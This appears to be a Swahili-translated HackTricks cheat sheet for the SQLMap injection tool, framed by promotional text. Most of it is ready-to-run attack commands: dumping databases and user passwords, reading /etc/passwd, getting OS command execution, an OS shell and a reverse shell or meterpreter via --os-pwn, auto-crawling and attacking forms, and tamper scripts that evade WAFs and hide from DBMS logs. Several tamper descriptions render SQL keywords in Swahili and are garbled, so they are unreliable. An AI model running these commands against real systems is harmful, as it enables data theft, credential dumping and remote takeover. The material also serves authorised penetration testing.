SQLMap - Cheetsheat

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Usanidi uliopo mara moja kwa tathmini ya hatari & upenyezaji. Tekeleza pentest kamili kutoka mahali popote na zana & vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wadukuzi - tuna

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Pata Taarifa

Ndani

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

Data ya DB

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Mahali pa Uingizaji

Kutoka kwa Kukamata Burp/ZAP

Kamata ombi na unda faili ya req.txt

sqlmap -r req.txt --current-user

Uingizaji wa Ombi la GET

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

Kuingiza Ombi la POST

sqlmap -u "http://example.com" --data "username=*&password=*"

Uingizaji katika Vichwa vya Habari na njia nyingine za HTTP

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Onesha string wakati uingizaji unafanikiwa

--string="string_showed_when_TRUE"

Eval

Sqlmap inaruhusu matumizi ya -e au --eval kusindika kila mzigo kabla ya kutuma na python oneliner fulani. Hii inafanya iwe rahisi na haraka kusindika kwa njia za desturi mzigo kabla ya kutuma. Katika mfano ufuatao kikao cha kuki cha flask kinasainiwa na flask na siri inayojulikana kabla ya kutuma:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Kifuniko

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Soma Faili

--file-read=/etc/passwd

Kutambaa tovuti kwa kutumia SQLmap na kiotomatiki kutekeleza shambulio

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Kuingiza Mara ya Pili

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Soma chapisho hilikuhusu jinsi ya kutekeleza sindano za pili rahisi na ngumu na sqlmap.

Kubinafsisha Sindano

Weka kifupi

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Kiambishi

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Kusaidia kupata uingizaji wa boolean

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Kuharibu

Kumbuka kwamba unaweza kuunda kiharibu chako mwenyewe kwa kutumia python na ni rahisi sana. Unaweza kupata mfano wa kiharibu katika ukurasa wa Kuingiza Mara ya Pili hapa.

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperMaelezo

apostrophemask.py

Badilisha herufi ya apostrophe na mbadala wake wa UTF-8 kamili

apostrophenullencode.py

Badilisha herufi ya apostrophe na mbadala wake haramu wa mara mbili wa unicode

appendnullbyte.py

Ongeza herufi ya NULL iliyofungwa mwishoni mwa mzigo

base64encode.py

Base64 herufi zote katika mzigo uliopewa

between.py

Badilisha mwendeshaji mkubwa ('>') na 'SI KATI YA 0 NA #'

bluecoat.py

Badilisha herufi ya nafasi baada ya taarifa ya SQL na herufi sahihi tupu ya random. Kisha badilisha herufi = na mwendeshaji KAMA

chardoubleencode.py

Double url-encodes herufi zote katika mzigo uliopewa (bila kusindika tayari imekodishwa)

commalesslimit.py

Badilisha visa kama 'KIKOMBO M, N' na 'KIKOMBO N OFFSET M'

commalessmid.py

Badilisha visa kama 'MID(A, B, C)' na 'MID(A KUTOKA B KWA C)'

concat2concatws.py

Badilisha visa kama 'CONCAT(A, B)' na 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

charencode.py

Url-encodes herufi zote katika mzigo uliopewa (bila kusindika tayari imekodishwa)

charunicodeencode.py

Unicode-url-encodes herufi ambazo hazijakodishwa katika mzigo uliopewa (bila kusindika tayari imekodishwa). "%u0022"

charunicodeescape.py

Unicode-url-encodes herufi ambazo hazijakodishwa katika mzigo uliopewa (bila kusindika tayari imekodishwa). "\u0022"

equaltolike.py

Badilisha visa vyote vya mwendeshaji sawa ('=') na mwendeshaji 'KAMA'

escapequotes.py

Kukwepa herufi za nukuu (' na ")

greatest.py

Badilisha mwendeshaji mkubwa ('>') na mbadala wa 'KUBWA'

halfversionedmorekeywords.py

Ongeza maoni ya MySQL yenye toleo mbele ya kila neno muhimu

ifnull2ifisnull.py

Badilisha visa kama 'IFNULL(A, B)' na 'IF(ISNULL(A), B, A)'

modsecurityversioned.py

Zungusha swali kamili na maoni yenye toleo

modsecurityzeroversioned.py

Zungusha swali kamili na maoni yenye toleo sifuri

multiplespaces.py

Ongeza nafasi nyingi karibu na maneno muhimu ya SQL

nonrecursivereplacement.py

Badilisha maneno muhimu ya SQL yaliyopangwa mapema na uwakilishi unaofaa kwa kubadilishwa (k.m. .badilisha("CHAGUA", ""))

percentage.py

Ongeza alama ya asilimia ('%') mbele ya kila herufi

overlongutf8.py

Geuza herufi zote katika mzigo uliopewa (bila kusindika tayari imekodishwa)

randomcase.py

Badilisha kila herufi ya neno muhimu na thamani ya kesi ya random

randomcomments.py

Ongeza maoni ya random kwa maneno muhimu ya SQL

securesphere.py

Ongeza mnyororo maalum wa herufi

sp_password.py

Ongeza 'sp_password' mwishoni mwa mzigo kwa kuficha moja kwa moja kutoka kwenye magogo ya DBMS

space2comment.py

Badilisha herufi ya nafasi (' ') na maoni

space2dash.py

Badilisha herufi ya nafasi (' ') na maoni ya mstari ('--') ikifuatiwa na mnyororo wa random na mstari mpya ('\n')

space2hash.py

Badilisha herufi ya nafasi (' ') na herufi ya pauni ('#') ikifuatiwa na mnyororo wa random na mstari mpya ('\n')

space2morehash.py

Badilisha herufi ya nafasi (' ') na herufi ya pauni ('#') ikifuatiwa na mnyororo wa random na mstari mpya ('\n')

space2mssqlblank.py

Badilisha herufi ya nafasi (' ') na herufi tupu ya random kutoka kwa seti sahihi ya herufi mbadala

space2mssqlhash.py

Badilisha herufi ya nafasi (' ') na herufi ya pauni ('#') ikifuatiwa na mstari mpya ('\n')

space2mysqlblank.py

Badilisha herufi ya nafasi (' ') na herufi tupu ya random kutoka kwa seti sahihi ya herufi mbadala

space2mysqldash.py

Badilisha herufi ya nafasi (' ') na maoni ya mstari ('--') ikifuatiwa na mstari mpya ('\n')

space2plus.py

Badilisha herufi ya nafasi (' ') na plus ('+')

space2randomblank.py

Badilisha herufi ya nafasi (' ') na herufi tupu ya random kutoka kwa seti sahihi ya herufi mbadala

symboliclogical.py

Badilisha waendeshaji wa mantiki AND na OR na mbadala zao wa ishara (&& na

unionalltounion.py

Badilisha UNION ALL SELECT na UNION SELECT

unmagicquotes.py

Badilisha herufi ya nukuu (') na combo ya multi-byte %bf%27 pamoja na maoni ya jumla mwishoni (ili kufanya kazi)

uppercase.py

Badilisha kila herufi ya neno muhimu na thamani ya herufi kubwa 'WEKA'

varnish.py

Ongeza kichwa cha HTTP 'X-originating-IP'

versionedkeywords.py

Zungusha kila neno muhimu lisilo la kazi na maoni ya MySQL yenye toleo

versionedmorekeywords.py

Zungusha kila neno muhimu na maoni ya MySQL yenye toleo

xforwardedfor.py

Ongeza kichwa cha HTTP bandia 'X-Forwarded-For'

Usanidi wa papo hapo wa upimaji wa udhaifu & uchunguzi wa kuingilia. Tekeleza pentest kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoenda kutoka kwa uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa pentest - tunaendeleza zana za desturi, ugunduzi & moduli za kutumia ili kuwarudishia muda wa kuchimba kwa kina, kuvunja makompyuta, na kufurahi.

Jifunze kuhusu kuingilia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated